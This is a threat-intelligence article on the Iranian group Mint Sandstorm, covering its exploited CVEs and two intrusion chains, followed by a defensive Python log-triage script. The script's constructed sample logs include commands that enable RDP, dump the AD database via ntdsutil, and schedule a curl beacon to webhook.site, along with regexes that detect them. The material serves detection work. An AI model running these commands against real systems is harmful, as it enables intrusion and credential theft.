Mint Sandstorm, an Iranian advanced persistent threat (APT) group, allegedly conducted several malicious attacks against United States critical infrastructure from 2021 to 2022. The group, also known as PHOSPHORUS, appears to be upgrading its tactics, techniques, and procedures (TTPs) to make its attacks more efficient.
The group has also begun weaponising several vulnerabilities in enterprise applications using publicly available proof-of-concept (POC) exploits. Mint Sandstorm deploys custom tools against its targets, such as energy firms and the transportation sector.
Researchers confirmed that the APT group started exploiting several security flaws, such as CVE-2021-44228, CVE-2021-45046 (Log4Shell), CVE-2022-47986 (IBM Aspera Faspex), and CVE-2022-47966 (Zoho ManageEngine).
This Iranian threat group targets public and private organisations, including the Defence Industrial Base and various government agencies, as well as individuals such as journalists, activists, political figures, and government personnel.
In addition, one of Mint Sandstorm's subgroups executed a chain of attacks against seaports, transportation systems, energy firms, utilities, and gas entities.
Mint Sandstorm uses two attack chains, either of which can open an intrusion.
According to investigations, Mint Sandstorm launches a custom PowerShell script in the discovery phase to harvest information about the environment. If the target meets the group's criteria, it then proceeds with one of its two attack chains.
The first attack chain uses Impacket to move laterally across the network. It relies on PowerShell scripts to identify admin accounts and enable RDP connections, uses an SSH tunnel for command and control, and steals the Active Directory database to obtain user account data.
The second chain also uses Impacket for lateral movement, but relies on webhook[.]site for command and control, creates scheduled tasks to establish persistence, and launches a custom malware payload rather than a simple script and publicly available tools.
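The two chains above leave recognisable traces on endpoints: PowerShell-based discovery, RDP being switched on, access to the Active Directory database, scheduled tasks whose command references webhook.site. The following log-triage helper is an added example, not code from the original article or from any vendor; it runs a small rule set over constructed command-line log events in a generic `key="value"` export format (the field names `host`, `user`, `cmd` and `target`, the sample hosts and the placeholder webhook.site ID are all assumptions) and ranks hosts by the combined weight of matched behaviours, so that a host showing both task creation and the webhook.site callback surfaces above one with a lone discovery command.

```python
"""Rule-based triage of process-creation log lines for the Mint Sandstorm
behaviours described above. Added example; log format and sample data are
constructed for illustration, not taken from a real environment."""
import re
from typing import Dict, List, Tuple

# Each rule is (tag, weight, regex). Regexes run over the lower-cased command
# line plus any target path, so matching is case-insensitive by construction.
RULES: List[Tuple[str, int, "re.Pattern[str]"]] = [
    # Registry value fDenyTSConnections set to 0 enables inbound RDP.
    ("rdp_enabled", 2, re.compile(r"fdenytsconnections.*/d\s+0\b")),
    # Command lines that call out to webhook.site (the chain-two C2 channel).
    ("webhook_site_c2", 3, re.compile(r"webhook\.site")),
    # Scheduled-task creation, used by chain two for persistence.
    ("schtask_create", 1, re.compile(r"schtasks(\.exe)?\s+/create|register-scheduledtask")),
    # Access to the AD database or the tool that exports it.
    ("ntds_access", 4, re.compile(r"ntds\.dit|ntdsutil")),
    # PowerShell invoking common AD / account discovery cmdlets.
    ("powershell_discovery", 1,
     re.compile(r"powershell.*(get-aduser|get-adgroupmember|net\s+group|whoami)")),
]

# Constructed sample events (assumed key="value" export; timestamps are made up).
SAMPLE_LOGS = [
    r'ts=2023-04-01T10:02:11Z host=WS01 user=jdoe cmd="powershell.exe -nop -w hidden Get-ADGroupMember Domain Admins"',
    r'ts=2023-04-01T10:05:40Z host=WS01 user=jdoe cmd="reg add HKLM\System\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f"',
    r'ts=2023-04-01T11:17:03Z host=DC01 user=svc_backup cmd="ntdsutil.exe" target="C:\Windows\NTDS\ntds.dit"',
    r'ts=2023-04-01T11:30:55Z host=WS02 user=asmith cmd="schtasks.exe /create /tn Updater /tr curl https://webhook.site/PLACEHOLDER-ID /sc minute /mo 5"',
    r'ts=2023-04-01T11:31:10Z host=WS03 user=bjones cmd="notepad.exe C:\Users\bjones\notes.txt"',
]

_FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line: str) -> Dict[str, str]:
    """Parse one key=value / key="quoted value" log line into a dict."""
    fields: Dict[str, str] = {}
    for m in _FIELD.finditer(line):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return fields


def event_text(event: Dict[str, str]) -> str:
    """Concatenate the fields a rule should see, lower-cased."""
    return " ".join(event.get(k, "") for k in ("cmd", "target")).lower()


def match_rules(event: Dict[str, str]) -> List[str]:
    """Return the tags of every rule whose regex matches the event."""
    text = event_text(event)
    return [tag for tag, _weight, rx in RULES if rx.search(text)]


def triage(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit record per log line that matches at least one rule."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        ev = parse_line(line)
        tags = match_rules(ev)
        if tags:
            hits.append({"ts": ev.get("ts"), "host": ev.get("host"),
                         "user": ev.get("user"), "tags": tags})
    return hits


def rank_hosts(lines: List[str]) -> List[Tuple[str, int]]:
    """Sum rule weights per host (each tag counted once) and rank descending."""
    weights = {tag: w for tag, w, _rx in RULES}
    seen: Dict[str, set] = {}
    for hit in triage(lines):
        seen.setdefault(str(hit["host"]), set()).update(hit["tags"])  # type: ignore[arg-type]
    scored = [(host, sum(weights[t] for t in tags)) for host, tags in seen.items()]
    return sorted(scored, key=lambda hs: (-hs[1], hs[0]))


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOGS):
        print(hit)
    print(rank_hosts(SAMPLE_LOGS))
```

The weights are deliberately simple: a single discovery cmdlet or one scheduled task is noise in many environments, while reading `ntds.dit` outside a backup window or a webhook.site callback almost never is, so those carry the score. In practice the rule set would be fed from an EDR or Sysmon process-creation feed rather than a text export, and the user field would be checked against the accounts expected to run domain-controller backups.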
Cybersecurity experts explained that Mint Sandstorm's constant upgrades to its TTPs could make it an even more dangerous threat. Organisations should block executable files from running unless they meet the proper criteria and do not come from a suspicious source.